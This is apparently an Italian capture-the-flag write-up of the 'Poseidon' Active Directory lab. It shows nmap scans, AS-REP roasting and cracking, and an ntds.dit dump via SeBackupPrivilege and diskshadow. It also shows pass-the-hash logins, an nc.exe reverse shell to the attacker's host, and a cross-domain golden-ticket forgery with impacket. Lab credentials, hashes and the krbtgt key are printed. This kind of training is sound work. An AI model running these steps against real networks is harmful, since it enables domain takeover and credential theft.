Poseidon

Network

IP	DOMAIN NAME	NAME	NOTES	ORDINE
192.168.166.161	poseidon.yzx	DC01	OWNED	3
192.168.166.162	sub.poseidon.yzx	DC02	OWNED	1
192.168.166.163		GYOZA	OWNED	2

Objectives

We have been tasked to conduct a penetration test on the network of poseidon.xyz. Several vulnerabilities and misconfigurations are present on the Active Directory environment, which can be leveraged by an attacker to gain access to all workstations. The main objective is obtain access to the Domain Controller.

The public subnet of the network resides in the 192.168.xx.0/24 range, where the xx of the third octet can be found under the IP ADDRESS field in the control panel.

Credentials

chen:freedom
lisa:LisaWayToGo456

DC01

Enumeration

PORT	SERVICE	NOTES
53/tcp	domain	Simple DNS Plus
88/tcp	kerberos-sec	KERBEROS
135/tcp	msrpc	MSRPC
139/tcp	netbios-ssn	SMB
389/tcp	ldap	LDAP
445/tcp	microsoft-ds	SMB
464/tcp	kpasswd5
593/tcp	http-rpc-epmap	MSRPC
636/tcp	ldapssl	LDAP
3268/tcp	globalcatLDAP	LDAP
3269/tcp	globalcatLDAPssl	LDAP
5985/tcp	wsman	OMI
9389/tcp	adws

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports1.txt 192.168.166.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:19 CET
Nmap scan report for 192.168.166.161
Host is up (0.065s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49699/tcp open  unknown
49952/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49665,49666,49668,49669,49670,49699,49952 -oN alltcp1.txt 192.168.166.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:24 CET
Nmap scan report for 192.168.166.161
Host is up (0.067s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-03 09:24:55Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: POSEIDON)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49699/tcp open  msrpc        Microsoft Windows RPC
49952/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc01
|   NetBIOS computer name: DC01\x00
|   Domain name: poseidon.yzx
|   Forest name: poseidon.yzx
|   FQDN: dc01.poseidon.yzx
|_  System time: 2025-01-03T09:25:48+00:00
|_clock-skew: mean: 0s, deviation: 2s, median: 0s
| smb2-time: 
|   date: 2025-01-03T09:25:45
|_  start_date: 2024-12-11T20:26:21
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Exploit e Privilege Escalation

Dalla macchina 192.168.166.162 ho estratto tutti gli hash del dominio sub.poseidon.yzx. Tra questi c'era anche quello di krbtgt.

PowerShell

krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2

Con questo hash possiamo creare un Golden Ticket.

Ho isogno dei seguenti dati:

SID del dominio di provienza, in questo caso sub.poseidon.yzx
SID del dominio di destinazione, in questo caso poseidon.yzx
hash di krbtgt
un utente valido ed esistente sul dominio di provienza, in questo caso Administrator

Recupero del SID del dominio di provenienza (figlio):

PowerShell

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : sub / S-1-5-21-4168247447-1722543658-2110108262

Recupero SID del dominio di destinazione (padre):
PowerShell
```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::trust /patch

Domain: POSEIDON.YZX (POSEIDON / S-1-5-21-1190331060-1711709193-932631991)
```
Warning

Trattandosi del dominio Enterprise, è necessario aggiungere alla fine del SID, il valore 519 per ottenere il SID completo. Qui maggiori info.

Impostare i puntamenti sul file /etc/hosts, inquesto caso:

Bash

192.168.166.161 poseidon.yzx dc01.poseidon.yzx
192.168.166.162 sub.poseidon.yzx dc02.sub.poseidon.yzx

Eseguire su kali:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 \
-domain-sid S-1-5-21-4168247447-1722543658-2110108262 \
-domain sub.poseidon.yzx \
-extra-sid S-1-5-21-1190331060-1711709193-932631991-519 \
administrator -extra-pac

E ottengo:

Bash

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:139: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for sub.poseidon.yzx/administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:598: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:716: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:717: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:841: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

Poi importo la variabile KRB5CCNAME:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$  export KRB5CCNAME=/home/momphucker/Desktop/offsec_/machines/Poseidon/administrator.ccache

E infine eseguo impacket-psexec 'sub.poseidon.yzx/administrator@dc01.poseidon.yzx' -k -no-pass:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-psexec 'sub.poseidon.yzx/administrator@dc01.poseidon.yzx' -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on dc01.poseidon.yzx.....
[*] Found writable share ADMIN$
[*] Uploading file OejOaaxY.exe
[*] Opening SVCManager on dc01.poseidon.yzx.....
[*] Creating service SrrZ on dc01.poseidon.yzx.....
[*] Starting service SrrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.166.161
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.166.254

Tunnel adapter Reusable ISATAP Interface {3A609699-C2B5-4DB1-A8C3-D06AE78AA003}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Concludo con il recupero della flag proof.txt:

DC02

Enumeration

PORT	SERVICE	VERSION	NOTES
53/tcp			DNS
88/tcp			KERBEROS
135/tcp			MSRPC
139/tcp			SMB
389/tcp			LDAP
445/tcp			SMB
464/tcp
593/tcp			MSRPC
636/tcp			LDAP
3268/tcp			LDAP
3269/tcp			LDAP
3389/tcp			RDP
5985/tcp			OMI
9389/tcp

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports2.txt 192.168.166.162
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:12 CET
Nmap scan report for 192.168.166.162
Host is up (0.065s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49699/tcp open  unknown
50553/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49665,49666,49668,49669,49670,49699,50553 -oN alltcp2.txt 192.168.166.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:16 CET
Nmap scan report for 192.168.166.162
Host is up (0.067s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-03 09:16:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: sub)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: sub
|   NetBIOS_Domain_Name: sub
|   NetBIOS_Computer_Name: DC02
|   DNS_Domain_Name: sub.poseidon.yzx
|   DNS_Computer_Name: dc02.sub.poseidon.yzx
|   DNS_Tree_Name: poseidon.yzx
|   Product_Version: 10.0.14393
|_  System_Time: 2025-01-03T09:17:07+00:00
|_ssl-date: 2025-01-03T09:17:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc02.sub.poseidon.yzx
| Not valid before: 2024-09-17T13:21:20
|_Not valid after:  2025-03-19T13:21:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
50553/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc02
|   NetBIOS computer name: DC02\x00
|   Domain name: sub.poseidon.yzx
|   Forest name: poseidon.yzx
|   FQDN: dc02.sub.poseidon.yzx
|_  System time: 2025-01-03T09:17:10+00:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-time: 
|   date: 2025-01-03T09:17:08
|_  start_date: 2024-12-11T20:55:39
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Su Kerberos uso Kerbrute:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/custscript/kerbrute/dist]
└─$ ./kerbrute_linux_arm64 userenum --dc 192.168.166.162 -d sub.poseidon.yzx /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 01/03/25 - Ronnie Flathers @ropnop

2025/01/03 11:39:03 >  Using KDC(s):
2025/01/03 11:39:03 >   192.168.166.162:88

2025/01/03 11:39:05 >  [+] VALID USERNAME:       jackie@sub.poseidon.yzx
2025/01/03 11:39:05 >  [+] VALID USERNAME:       lisa@sub.poseidon.yzx
2025/01/03 11:39:06 >  [+] chen has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$chen@SUB.POSEIDON.YZX:918f5ec47abb121633a27a92d4e10225$eecf670116cee17c78b0e1a8f98ea7394c791f73435123b827a1b560046c0aab25170bea9dcb8d61e83eb9ae4c7cd70f4417f50b9d63f446cecdfe5b96f9270f3e36f98086dd2b548929c45a7ba0996aa81f2a1ccdf6b4632ba39bc10da8dd9b6248c80177f08839c10ad16b10188f6bd0f73b9c526de29a3c9bd8dbaa362a062b267b2412092f2d209918030638d154f50f6782d12a236c77d3096b76ebd2cc12bf4ca2e5a8ed41b1ae5f224549d69f81a65d5d40090da96426bb0d0061b94d8125275d72bfa4b070621d18b520a761958e6452928d1d69f43ca203bcd53c20d3919ba342ccdbd197b0ae7ae7101889b0110b959437aa37fef5300413683a3372565fc46096a549                           
2025/01/03 11:39:06 >  [+] VALID USERNAME:       chen@sub.poseidon.yzx
2025/01/03 11:39:16 >  [+] VALID USERNAME:       administrator@sub.poseidon.yzx
2025/01/03 11:39:28 >  [+] VALID USERNAME:       Jackie@sub.poseidon.yzx
2025/01/03 11:39:40 >  [+] VALID USERNAME:       poseidon@sub.poseidon.yzx
2025/01/03 11:40:05 >  [+] Chen has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$Chen@SUB.POSEIDON.YZX:782a847d53cb5874a4d53596082869a8$51473d01dc64ba6576c1d1b7cc220c11015688e94692b43fd27f95ee8e3a8a5d8fc3cb35ed6a419f8e70101e2e8fe5c461f6c5df599312b2939b72fbdf60d9eff59c6691d83e2bfe8dde8a549266921034cfdada062c198e1db94bdeb582cbb5fc859413fe729afaff68d6bd358ca0f39a38d12e16e9365f870b4e14bf4c7e2ccb2c7b15018218653c2abe58963b4664a5435655a5c447d6630e7ddd4406c8ea492b21d9f78298a6ee5c9c376f3792cbbd5f2795a3bae260ceb6537bb554162d167c98791f0b88f1e5452e5fe622183e6642c0f24c4d3e66ed46c5626cf6fd2b66c65996549a3b3e8fef9fff318b05db4ae0f4fb4690a609873aeeca1dc0750158efee14e7e6270d

Kerbrute in questo caso ha trovato degli hash di typo 18, non crackabile ne con hashcat ne con john. Quindi, recuperati gli utenti con Kerbrute, recupero gli hash con impacket.

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-GetNPUsers sub.poseidon.yzx/ -dc-ip 192.168.166.162 -usersfile users.txt -outputfile hashes.txt 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$chen@SUB.POSEIDON.YZX:c008ef46ef9a0925de50bea8211dae1f$9d6b304bf616c1b7103fa62572961bf8b56098751258c045933e42fa607cd626686aabb1edac480682cf83238fa6ac25af745e603355cf53602c5ac0001b452b43e3749159791b21bbd14f53c9a18749b4c73eaedd52b796768df5dce6be000fa19e7aebb4ef786cffa53162e1a39b6200795cdd5a86922babdcce327e5d16da9ab8c22e55661e1939cd997623930aed8fe37d5880e72f67bf924feb3f86a3e2d9291ff62cc3d71c7918c768bcc56aab85ca128cbc409a025865b661f0d906b52ea3b0c9c590ed9a1341e2de4fdc129f92c08a35c3e3602a40aaf6a353e43de20e2ac09fc0a64068fbe10c6f477b917463152c90

E procedo al crackj con john:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ john hashes.txt                                                                                   
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
freedom          ($krb5asrep$23$chen@SUB.POSEIDON.YZX)     
1g 0:00:00:00 DONE 2/3 (2025-01-03 12:19) 14.28g/s 721142p/s 721142c/s 721142C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Credenziali

chen:freedom Uso le credenziali di chen per accedere alla macchina 192.168.166.163.

Exploit

Accedo con Evil-WinRM usando le credenziali resetate jackie:

PowerShell

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.162 -u jackie -p 'Aa.123456!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jackie\Documents>

Privilege Escalation

Verifico i privilegi:

PowerShell

*Evil-WinRM* PS C:\Users\jackie\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Utilizzo il privilegio SeBackupPrivilege per eseguire una copia da scaricare di SAM e SYSTEM:

PowerShell

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Recupero gli hash:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo pypykatz registry --sam sam system
[sudo] password for momphucker: 
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 6147911c9221199f60a625e5011aafde
============== SAM hive secrets ==============
HBoot Key: 4d5e6433a492e877a9d8db8b2f203d4210101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Scarico il file ntds.dit in questo modo seguendo questa procedura:

Creo il file raj.dsh e al suo interno inserisco quanto segue:

Text Only

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Infine eseguo unix2dos raj.dsh e carico il file sulla macchina target.

Sulla macchina target seguo i seguenti passaggi:

Creo la cartella C:\Temp se già non esiste, e al suo interno carico il file raj.dsh. Successivamente eseguo diskshadow /s raj.dsh e poi robocopy /b z:\windows\ntds . ntds.dit:

PowerShell

cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit

Scarico localemnte il file ntds.dit copiato dentro la cartella C:\Temp

Infine estraggo tutti gli hash:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-secretsdump -ntds ntds.dit -system system LOCAL                                                                
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 510cae62a7d31edc77934766cf32f0ac
[*] Reading and decrypting hashes from ntds.dit 
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:14f50341e5ace079e432dcb8b402e5e5:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sub$:1103:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
POSEIDON$:1103:aad3b435b51404eeaad3b435b51404ee:01196f308a81e26264eb41dbb4b3e668:::
sub.poseidon.yzx\chen:1104:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::
sub.poseidon.yzx\jackie:1105:aad3b435b51404eeaad3b435b51404ee:cea6f34ba33ec67388a7bfba44d8f648:::
sub.poseidon.yzx\lisa:1106:aad3b435b51404eeaad3b435b51404ee:905ae9b4d957545fb7b9ea0c4333247b:::
GYOZA$:1107:aad3b435b51404eeaad3b435b51404ee:d14a49d1a69fe84da13a6ac39ac6d5dd:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:e2786e98a3205f9085ef7071d992422f735ce704f4ba5c29f65f25beed348228
Administrator:aes128-cts-hmac-sha1-96:b6593732b7ab7cecd59afadef15b4315
Administrator:des-cbc-md5:e0e03d58a15d315e
DC02$:aes256-cts-hmac-sha1-96:685e1ea1f554aef467f22ffe54952c001c832c464c5d739b525b1896cb1fcada
DC02$:aes128-cts-hmac-sha1-96:65629090b82e25515362b76e9c3197c1
DC02$:des-cbc-md5:70ef3d4526cda4f8
krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
krbtgt:aes128-cts-hmac-sha1-96:b5d83edef61d3c3799047e208e13b2c7
krbtgt:des-cbc-md5:b95ee5a11c10d989
POSEIDON$:aes256-cts-hmac-sha1-96:2618b7c5368e0265beeb5ac94fc9aa5019b16756550165d31378f03d84b006f8
POSEIDON$:aes128-cts-hmac-sha1-96:69c985205083323653af6afce39caee3
POSEIDON$:des-cbc-md5:7545074cce61d9b9
sub.poseidon.yzx\chen:aes256-cts-hmac-sha1-96:f82ec7ba1f7bde73f1549522dde64ca50dd7ff961efcec17939e567a249da43f
sub.poseidon.yzx\chen:aes128-cts-hmac-sha1-96:cfe54b16b15b6b2ab05e29c668e3bd6a
sub.poseidon.yzx\chen:des-cbc-md5:e668b01cf4625ed6
sub.poseidon.yzx\jackie:aes256-cts-hmac-sha1-96:354f64fbc9d6c06dd0df7ebfc2f390c3c4b21f91eeef0e2e4d9f7208622d34a4
sub.poseidon.yzx\jackie:aes128-cts-hmac-sha1-96:5c1b868f3526bc69744ca24c4998ca6c
sub.poseidon.yzx\jackie:des-cbc-md5:7a0d760de0d3d01a
sub.poseidon.yzx\lisa:aes256-cts-hmac-sha1-96:c9f63c9c18b1cf994a0296106a91d61168e76f28a030e0e553dbdd27dd9834ef
sub.poseidon.yzx\lisa:aes128-cts-hmac-sha1-96:65e93d705fc16a2f47edd6925fc68739
sub.poseidon.yzx\lisa:des-cbc-md5:a2138cb9b319e673
GYOZA$:aes256-cts-hmac-sha1-96:26a2228be65080a4c2992c15f8dce665871e2136584c8feb46fc8a6efced7fc8
GYOZA$:aes128-cts-hmac-sha1-96:2c68a503faefc735e97144497c268c0f
GYOZA$:des-cbc-md5:fd54702c373bfbba
[*] Cleaning up...

A questo punto mi collego via Evil-WinRMcon Administrator e il suo hash

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.162 -u '.\Administrator' -H '3bcdd818f7ec942ac91aa30d8db71927'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                               
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                            
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sub\administrator

Apro una shell interattiva:

PowerShell

*Evil-WinRM* PS C:\users\jackie\desktop\wintools\wintools> .\nc.exe 192.168.45.248 4466 -e cmd

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec
└─$ nc -nvlp 4466
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.162] 51592
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\users\jackie\desktop\wintools\wintools>

Recupero le flag local.txt e proof.txt:

GYOZA

Enumeration

PORT	SERVICE	NOTES
135/tcp	msrpc	MSRPC
139/tcp	netbios-ssn	SMB
445/tcp	microsoft-ds	SMB
5040/tcp	unknown	-
5985/tcp	wsman	OMI
7680/tcp	pando-pub	-
47001/tcp	winrm	WINRM

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.163
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 09:58 CET
Nmap scan report for 192.168.166.163
Host is up (0.069s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49675/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670,49675 -oN alltcp.txt 192.168.166.163 
